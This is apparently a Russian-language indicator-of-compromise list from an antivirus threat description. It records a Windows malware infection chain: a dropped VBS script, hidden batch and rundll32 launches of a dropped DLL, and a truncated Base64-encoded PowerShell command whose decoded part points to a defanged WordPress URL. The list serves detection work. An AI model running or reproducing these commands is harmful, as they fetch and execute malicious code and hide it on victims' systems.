Техническая информация
- '<SYSTEM32>\wscript.exe' %ALLUSERSPROFILE%\tghklsd.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1472
- %TEMP%\error013600_01.xml
- %ALLUSERSPROFILE%\tghklsd.vbs
- %ALLUSERSPROFILE%\jledshf.bat
- %TEMP%\1098574.cvr
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\jledshf.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%ALLUSERSPROFILE%\jledshf.bat" "
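- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABqAGUAbwBsAGkAcwBlADMAUgBoAGcARABaAFMANABjAGQAZgBnAD0AIgBoAHQAdABwADoALwAvAHMAdQBtAGUAZABoAGEAbwBuAGwAaQBuAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBIAHkAegBOAFgASgAzADAAWABPAFEAVgBj...
  (Значение параметра -enc — команда PowerShell в Base64 поверх UTF-16LE; на странице оно обрезано («...»), поэтому для точного сопоставления командной строки не подходит. Видимая часть декодируется в присваивание переменной строки с адресом hxxp://sumedhaonline[.]com/wp-content/… — домен можно использовать как сетевой индикатор при проверке журналов прокси и DNS.)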
- '<SYSTEM32>\cmd.exe' /c start /B %WINDIR%\syswow64\rundll32.exe %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\vbkwk.dll,dfsgeresd